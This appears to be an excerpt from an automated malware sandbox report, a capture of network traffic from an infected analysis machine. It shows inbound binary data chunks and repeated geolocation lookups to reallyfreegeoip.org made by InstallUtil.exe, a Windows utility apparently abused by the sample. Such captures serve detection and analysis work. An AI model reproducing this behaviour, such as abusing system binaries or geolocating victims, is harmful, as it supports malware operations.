2024-11-05 10:05:04 UTC	16384	IN	Data Raw: 4a 96 10 79 df 17 ed 71 30 3f 80 8f f5 d7 0e 7e 8c ca ce c7 a0 d9 16 77 c9 1c ba 3f 3f 8b 58 2d d3 04 c1 c2 ff 03 d0 30 79 f4 10 4b a5 f8 b5 cf ec 76 59 ce 1d 59 b1 b7 a0 07 c5 76 95 8a 08 09 77 a6 0d fb ca 51 fb 65 ac 3f da 62 1f 6a 69 42 82 92 52 a5 a0 1e 4a 79 b5 91 4c 62 6c 8f aa d2 f3 89 9b 2c 4d d7 ed ef 03 4c c0 e2 3d ee d0 3d 18 d2 0f 60 52 3b f1 a1 4d 26 80 53 cd 13 1f d9 63 9b 5a ff 04 c0 1a 64 e4 40 c9 0e 7c 18 ef 21 50 d5 95 3a f0 aa 6b e5 b4 68 d1 2a 4a 2f 62 71 eb df 84 10 ca e4 e2 49 6f bd bf 53 68 1a f0 81 23 a1 d2 55 bd fa a0 b1 05 d8 8c b0 8a b5 27 9e 84 e7 d9 4b f9 42 09 63 d4 e1 62 71 73 fc 97 66 ff 7b c0 d8 0c 3f 73 b1 1f 41 4c 50 3b 68 10 b2 94 aa ee 7d c3 d7 39 d3 8e 49 eb 01 03 aa 3d 7a 2e 1d 44 7f f0 6a 1d c6 17 89 e8 25 f3 3b f5 Data Ascii: Jyq0?~w??X-0yKvYYvwQe?bjiBRJyLbl,ML==`R;M&ScZd@\|!P:kh*J/bqIoSh#U'KBcbqsf{?sALP;h}9I=z.Dj%;
2024-11-05 10:05:04 UTC	16384	IN	Data Raw: 58 1f 09 1a 73 ff 64 42 50 6b 62 9d 9a 3f 12 fb 38 da 7a 34 07 e0 46 9b 28 9c 63 9f a7 36 1e f8 b2 bb a9 d6 32 56 bc a9 c9 7d 90 03 b1 84 44 7a 4b dd 93 5a 89 42 b5 32 1e 7f 8e 60 19 d5 81 5e 44 60 a1 09 f5 86 f8 4c 5d b8 18 0d a5 76 bc 0d 63 56 bd 03 b3 9c a5 a5 ff 31 7e 90 b0 39 25 0f 95 3d d4 43 81 b7 0b 73 82 3c ca 78 0f f7 f3 3f 16 8d 06 0e 75 96 b4 4d cf ea 3b d4 5b 09 fb 6b d9 99 82 30 41 ba af d9 45 7e fc bd 88 a5 0b 25 e3 01 6b 9b 14 3a 6e dd a2 ba 25 cb f7 fa ff 2d c0 30 a0 d7 59 fd e2 b6 87 9f df 6d e5 6d ed a4 82 03 1b 0d 55 1a 0e f1 de 95 31 10 2a 9c 7a 21 f1 c3 d0 d8 eb 47 ca d9 77 89 ad 61 3d 95 d5 59 9e 58 f8 66 ad cb 3f 7f c4 a9 48 3c f5 01 1f 95 33 1e 53 44 44 66 8b e1 95 83 15 4c b8 d7 c8 13 ca aa bc 37 57 ef b6 8f 02 04 71 cd 17 4a 01 Data Ascii: XsdBPkb?8z4F(c62V}DzKZB2`^D`L]vcV1~9%=Cs<x?uM;[k0AE~%k:n%-0YmmU1*z!Gwa=YXf?H<3SDDfL7WqJ
2024-11-05 10:05:04 UTC	16384	IN	Data Raw: 9d 4a 40 db 05 07 fa 52 6f 9a 59 df 4b 95 03 25 93 4a f8 c2 ed 40 f7 66 30 a2 3c 24 eb b2 18 12 a1 e5 8a 35 4f cd 26 f7 d8 a1 0e ff 83 12 a4 00 2f 7c c1 ec b6 9e 21 37 03 8c 69 74 a6 5c 97 d5 d8 09 15 c8 68 ba 64 2a e8 a2 2e 74 12 08 47 94 02 78 77 96 8b 35 d3 2b cc bf 7d a0 01 b6 e0 51 ac 72 74 9e 01 34 44 38 50 a4 c5 24 e7 b9 a4 b3 c1 25 e3 34 37 ed 5e 13 8b cb 45 16 96 79 78 8d e6 91 9f e9 75 bf 00 7f 68 d7 a9 07 4f 60 37 49 6d 04 36 92 43 4e cc ee 51 7b 45 d8 28 df 58 c4 e0 4c f4 ce 05 e1 03 27 bb 7f 79 41 62 8a 53 62 ff 08 fe 29 99 b2 1b 9c 73 f4 04 34 b3 41 04 2d 77 08 31 2b c3 9f ae 37 69 02 cc 6c 8b d9 d0 29 4f ac 02 50 ce 24 15 ec df 73 77 5e 41 58 af 29 0b b8 04 6c c1 da 1f 9b d3 04 76 f3 26 08 cd 7e d7 12 85 f9 ab c6 e1 2b 3a 99 f9 66 89 38 a1 Data Ascii: J@RoYK%J@f0<$5O&/\|!7it\hd*.tGxw5+}Qrt4D8P$%47^EyxuhO`7Im6CNQ{E(XL'yAbSb)s4A-w1+7il)OP$sw^AX)lv&~+:f8
2024-11-05 10:05:05 UTC	16384	IN	Data Raw: b4 fe b3 af f3 6c 2c 39 da 77 f0 13 9a 85 b4 cb 64 4c 96 d3 7f 93 7f 3f 59 d0 71 bb 0d 5b 3c 40 d5 23 30 21 c3 bd 69 e5 55 c4 ff 94 40 61 94 c9 e2 01 54 56 01 96 61 62 5d fa 7c c1 39 27 ca 2a 1b 95 6b ce d6 72 7a 3f e7 d3 80 04 9b 38 39 26 79 d5 85 01 e6 4e eb de 76 69 50 e2 6e 1c 75 5e ef 3c 36 f4 ca 98 be 0d b8 48 e1 15 c7 3a 35 da e1 c3 33 11 51 bd 4b d2 0d d7 09 74 d1 97 44 d4 4a 8b 7b d7 0f 3d bc 6d 0f 4e 5d 55 81 1a 6c e5 25 1a 70 79 1f 67 a9 cf 25 fe 86 28 62 c6 83 49 d0 c7 d6 df 1b b1 22 e8 7d 3c f5 61 7e 45 a8 49 ff ec d4 cc e3 54 c1 95 cc 4e 3a b0 27 9a 1e 0d 25 df 51 ad 6b 69 7b 98 2f 0a ba 09 a9 6c f9 2d 82 5a 3e 9a 5f d0 b5 4d 7d 29 7a d4 30 cf 88 9d b5 61 39 ae b2 6d f9 b7 f1 72 52 60 c2 67 7b 1d f0 32 5a 10 9a 80 95 b3 af 34 7c 74 5f dc 49 Data Ascii: l,9wdL?Yq[<@#0!iU@aTVab]\|9'*krz?89&yNviPnu^<6H:53QKtDJ{=mN]Ul%pyg%(bI"}<a~EITN:'%Qki{/l-Z>_M})z0a9mrR`g{2Z4\|t_I
2024-11-05 10:05:05 UTC	16384	IN	Data Raw: 53 85 f6 60 a6 29 51 ce d5 c9 3d 5a 72 e5 dc ad 35 99 8d 63 65 4e 00 d1 e5 68 95 21 75 4a ec c0 7f cd 00 5f 58 af 5f b5 41 ff 3c ad 03 d7 9e aa ea 35 57 29 38 6b d8 e3 8f 2d 5a 73 a2 2a 2e 65 4b 4d 6f c2 78 97 7a 1e 23 72 8e 80 d1 94 17 98 91 fe 84 fa 24 c2 b5 20 55 39 2d d0 8f dc 59 8e 22 e2 1e eb df cb 6d be af 82 bc b7 2a 4b 0b a4 ca c8 eb a0 6c 2c 5e 3b 93 9a 07 6f bb 1b 50 db 1a 0b 13 a1 a9 a0 ed 29 6a cd ff 05 f4 55 cd 00 c0 85 39 38 9c 86 e6 a8 0e 1f b7 0c c6 e9 7a 26 8c 65 38 1a c5 a0 32 e5 fa a7 7a f6 d2 04 66 26 15 88 9f 6b 3d b8 22 e2 69 eb 53 8c 97 6a c6 63 50 72 e9 a4 63 43 78 91 10 37 52 ff 12 0f 53 e0 c5 71 3f e5 f4 dd 6b b2 b5 1e 18 32 a5 1d 3f 40 03 33 29 22 ff 4a 0f 7c c0 22 3d 5e c8 cf f9 31 a6 17 e6 b2 be d7 01 75 72 a4 76 4e 87 67 18 Data Ascii: S`)Q=Zr5ceNh!uJ_X_A<5W)8k-Zs.eKMoxz#r$ U9-Y"mKl,^;oP)jU98z&e82zf&k="iSjcPrcCx7RSq?k2?@3)"J\|"=^1urvNg
2024-11-05 10:05:05 UTC	16384	IN	Data Raw: f6 8e 45 af 8f 7a 3b b5 c9 c2 28 dd 67 ee f9 10 02 93 e9 5b 24 5e a2 43 e1 6d 28 b1 8b 4b 17 0b d8 43 cf 8b e6 10 c1 f8 ef 98 b3 28 fa 09 ae a7 d8 3c 72 bb 0a e9 48 48 21 32 9f 46 5f 58 57 06 aa 50 55 fb 04 a5 a1 ae 0a b6 bd 44 97 07 d1 8f d7 32 da 28 08 91 d8 f1 98 fa 49 e4 0e fb 24 e3 af a0 42 87 46 64 98 21 5b 4a 73 6b 05 42 43 1f 32 02 c5 f0 44 4c 26 f3 e9 df ae fc 04 f1 e9 b4 04 43 df 48 0d 29 a6 28 8f 6a 89 b2 f9 f2 3b a0 b2 19 3a ee 20 72 92 9c 7e df a0 ab c0 a9 4a 8c cb 35 20 f1 8e 49 7c 55 f0 96 53 2f af 6e 38 76 6f de 17 60 41 43 41 d6 54 05 18 04 26 4d 43 8a 31 8c d7 9f 5b ef 8e f7 a4 f7 58 dc 4b eb 31 04 09 5b 4b b7 a4 0e f4 8c 38 44 d9 f8 ff f2 db fc d5 ae f1 89 cb c2 ea 4a 11 c2 9a 5d f6 15 62 4f cc 83 19 ac e1 b5 39 9c 93 52 d9 75 d7 d8 47 Data Ascii: Ez;(g[$^Cm(KC(<rHH!2F_XWPUD2(I$BFd![JskBC2DL&CH)(j;: r~J5 I\|US/n8vo`ACAT&MC1[XK1[K8DJ]bO9RuG
2024-11-05 10:05:05 UTC	16384	IN	Data Raw: 75 83 75 3f 73 43 42 60 aa 05 41 a3 39 70 9e ba 0b 43 9b b5 0b 75 14 cc 80 c1 26 4d f2 22 60 fc 27 ab c0 43 43 5f 17 ca 51 0a b3 a5 40 ca 43 8a b9 92 af 7c 5d 5e 1f a0 5d fb 28 0c ad 90 ea d7 45 57 7c fa 5a c0 aa e7 5c a6 4a 64 07 57 82 ca 5c a4 14 2b 3a c4 58 19 d0 33 fb 65 3b 74 10 80 4a 07 8c 6d 57 30 3b d5 8a a9 9b 16 90 20 d1 5c 98 55 24 ad fc 74 6b 82 44 43 58 11 b3 4a bf ce ca d2 81 b2 fa 8b 25 ab 8a 01 3d 9f b6 5f 14 48 6d ad b9 2e 48 84 66 4c da d1 f5 3e db d5 a7 b9 69 99 1c e3 39 62 fe e2 6e 4a 69 0c 16 e6 0c 75 16 08 e1 b6 c0 08 bc 90 de 32 f0 1b 4a 3f 22 95 d8 85 70 f6 9a 74 92 d6 c4 6a ba e0 e3 93 a1 22 0a a2 5c 5e 5b 8d 26 eb 1b 4e ac b4 9a 02 b3 e3 55 23 17 12 41 de 05 f8 40 cc 87 1e 95 6c 3b 86 b7 f8 31 29 14 80 ca 75 57 be 7d 3e 9e 48 dc Data Ascii: uu?sCB`A9pCu&M"`'CC_Q@C\|]^](EW\|Z\JdW\+:X3e;tJmW0; \U$tkDCXJ%=_Hm.HfL>i9bnJiu2J?"ptj"\^[&NU#A@l;1)uW}>H
2024-11-05 10:05:05 UTC	16384	IN	Data Raw: 9e 23 71 3d eb 5e e6 c7 cb da 63 46 c2 cc e4 76 3a ef 02 68 4d a2 e6 d9 23 54 76 91 0f eb f2 af 77 cc 93 93 ba 3b e9 59 fa cd f4 a9 37 ed 39 bf bb ae 21 05 c6 6f 2e df 0e 97 f1 87 c9 35 97 02 ce da 85 4d 2d 38 e0 9c bb 67 c0 86 51 4b 79 65 29 58 07 d4 92 66 30 e7 33 cf 42 42 6b 75 00 ef 34 f9 c7 f1 0f a4 ec c8 f7 a2 dd 73 4a df cd c3 6f 4d 1a e8 3f 3b fe eb 46 c0 1e 03 5c f6 41 59 38 57 d8 83 cb 66 42 5b 3d ec d6 70 59 21 9d f8 e6 33 e7 98 f8 5a ec 0e 44 62 84 f0 47 7d 79 b4 f0 70 d6 37 37 e4 9b d5 d3 7d 82 73 c8 06 8d 21 cb 6a 62 b3 5a 2f 4e c5 ea 7d 68 ff b5 75 89 bc bd da 42 43 f2 f7 52 73 33 7d 4d 9c c6 61 a2 cd 3c d5 a8 83 1a 56 f4 81 a4 db ef bf 29 0a 82 6d 80 39 f8 70 c5 b5 1f fb 7b 2c e3 bf e2 c9 63 2e 78 87 08 75 04 2d 97 de 8f 12 cd f2 67 00 6d Data Ascii: #q=^cFv:hM#Tvw;Y79!o.5M-8gQKye)Xf03BBku4sJoM?;F\AY8WfB[=pY!3ZDbG}yp77}s!jbZ/N}huBCRs3}Ma<V)m9p{,c.xu-gm
2024-11-05 10:05:05 UTC	16384	IN	Data Raw: c9 d9 ac c5 75 59 a4 7f af d3 37 23 2e 2a a5 d8 93 c9 d4 f4 4f 66 0e a5 e7 29 a0 63 56 50 5a 1d 28 49 6c 9e b1 a4 ce e4 9c 3b e7 bf 4d 38 53 64 8c 27 5d ad 4a a3 94 2b ac 7e d5 dd 23 b3 2a c8 82 ef 40 ad df e4 d9 ff e0 9e 15 53 5a 31 d5 3e 60 a9 11 60 41 bf ad b9 81 e6 c3 ac 38 00 e7 37 61 15 46 1d 8b 70 cf 49 11 af a8 86 b2 00 42 46 a4 6d fb 3c 89 07 39 65 81 df b8 58 4c 8b d2 21 34 46 3e 87 8a ae 54 54 e7 55 9b 02 9a 1e c6 7a f7 e7 0d 01 e1 d4 65 8b 79 cf 20 27 03 9c dd 34 ee 05 3a 64 d5 d2 7c 30 65 85 37 e3 88 c6 c4 7a 0a e5 c6 73 44 b1 b5 a6 65 81 7d 28 8d a8 ab 19 02 36 9b 9a 94 c9 f1 d2 ae 5d 5b d4 d0 fd 64 58 ec e3 b3 97 26 1f ce 25 50 64 46 1a f7 cf 62 71 12 7d 93 3c b9 af 96 eb 13 a0 9c 8c f6 1e 9f 88 e9 6d ab 5d 75 c7 49 89 d7 d1 89 4d c7 91 ef Data Ascii: uY7#.Of)cVPZ(Il;M8Sd']J+~#@SZ1>``A87aFpIBFm<9eXL!4F>TTUzey '4:d\|0e7zsDe}(6][dX&%PdFbq}<m]uIM

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.7	49797	188.114.96.3	443	7776	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-05 10:05:10 UTC	87	OUT	GET /xml/173.254.250.76 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-05 10:05:10 UTC	1223	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 10:05:10 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: f48db563-38bd-42a9-b63a-818418801715 x-amzn-trace-id: Root=1-672998ba-34f2a3590ffa8780419fc51a;Parent=6cafe5a34f751c8d;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 86117dda17514641fed3de3744ba683c.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: Td8S9lDWOC33K3UrECn1ULteCcA3AUThIsZpaBIoj5aa5ts6rfIIBA== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 21788 Last-Modified: Tue, 05 Nov 2024 04:02:02 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QAD%2B9M%2Fmk1wgf6%2FYe2V9RX4MOmvYoDOkBoXsHhV6TSY0%2BKKhxTJT3q6BDjCjk7fY7SYlLrBXbnWnrkjRcayHMwb%2FWA8M3UQtDyP8Y7UP181R0cxYwJlY37u5M8Sb09FnnD%2BtUYZ3"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ddc061caf4a6b9a-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1746&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1550321&cwnd=226&unsent_bytes=0&cid=0c59a2659e111069&ts=149&x=0"
2024-11-05 10:05:10 UTC	146	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e Data Ascii: <Response><IP>173.254.250.76</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><Region
2024-11-05 10:05:10 UTC	213	IN	Data Raw: 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: Name>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.7	49813	188.114.96.3	443	2632	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-05 10:05:13 UTC	87	OUT	GET /xml/173.254.250.76 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-05 10:05:13 UTC	1215	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 10:05:13 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: f48db563-38bd-42a9-b63a-818418801715 x-amzn-trace-id: Root=1-672998ba-34f2a3590ffa8780419fc51a;Parent=6cafe5a34f751c8d;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 86117dda17514641fed3de3744ba683c.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: Td8S9lDWOC33K3UrECn1ULteCcA3AUThIsZpaBIoj5aa5ts6rfIIBA== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 21791 Last-Modified: Tue, 05 Nov 2024 04:02:02 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4G%2Br1um6ygpYAt1JJB9xJNovZu3FBFwhep3Lv320o4MJBOxhzaZMeCkaSAA%2FvvDYzaGj2f4dpEvhlk4F1MxejjpCPqmbDruD9zTWYnExd9K0NztQPVXOE2Ktz7RgCQNNjB5PJ3wh"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ddc062fcd46e832-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1357&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1990378&cwnd=251&unsent_bytes=0&cid=4f99fa70fb096baf&ts=430&x=0"
2024-11-05 10:05:13 UTC	154	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 Data Ascii: <Response><IP>173.254.250.76</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Tex
2024-11-05 10:05:13 UTC	205	IN	Data Raw: 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: as</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.7	49823	188.114.96.3	443	2632	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-05 10:05:14 UTC	63	OUT	GET /xml/173.254.250.76 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-05 10:05:14 UTC	1223	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 10:05:14 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: f48db563-38bd-42a9-b63a-818418801715 x-amzn-trace-id: Root=1-672998ba-34f2a3590ffa8780419fc51a;Parent=6cafe5a34f751c8d;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 86117dda17514641fed3de3744ba683c.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: Td8S9lDWOC33K3UrECn1ULteCcA3AUThIsZpaBIoj5aa5ts6rfIIBA== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 21792 Last-Modified: Tue, 05 Nov 2024 04:02:02 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vnjO%2FE8Bb4JK2EUmsZcyfBMkjUBk%2FzO7408OoknXsZMjYg3GHWC3w7Tagosx%2FcAUvnzBVcY%2Bkewn5Djc6T8KuC5WHPA3MIaJZS0McB12WzvVHrloXx%2Bd5tvwFrs%2BRtYF0t6eu7Ii"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ddc06361d4445e9-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1251&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2269592&cwnd=215&unsent_bytes=0&cid=7420b11a1ba1107e&ts=144&x=0"
2024-11-05 10:05:14 UTC	146	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e Data Ascii: <Response><IP>173.254.250.76</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><Region
2024-11-05 10:05:14 UTC	213	IN	Data Raw: 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: Name>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.7	49834	188.114.96.3	443	2632	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-05 10:05:16 UTC	87	OUT	GET /xml/173.254.250.76 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-05 10:05:16 UTC	1223	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 10:05:16 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: f48db563-38bd-42a9-b63a-818418801715 x-amzn-trace-id: Root=1-672998ba-34f2a3590ffa8780419fc51a;Parent=6cafe5a34f751c8d;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 86117dda17514641fed3de3744ba683c.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: Td8S9lDWOC33K3UrECn1ULteCcA3AUThIsZpaBIoj5aa5ts6rfIIBA== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 21794 Last-Modified: Tue, 05 Nov 2024 04:02:02 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UpG0sXVMMPam%2B5e3da2b0DW8jFYGt61ba9FGD5H6W3lW4M49JPqD3Km59JXiF%2B999acRIIjKb0EPjEHzRT4K3Fo032uuCp9yF2LcWlPw3mDIAex%2F38XXzp8c%2BADi1%2BsF8UyBwp8%2B"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ddc06405a174779-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1068&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=2627949&cwnd=251&unsent_bytes=0&cid=f2736cf5591c60c9&ts=148&x=0"
2024-11-05 10:05:16 UTC	146	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e Data Ascii: <Response><IP>173.254.250.76</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><Region
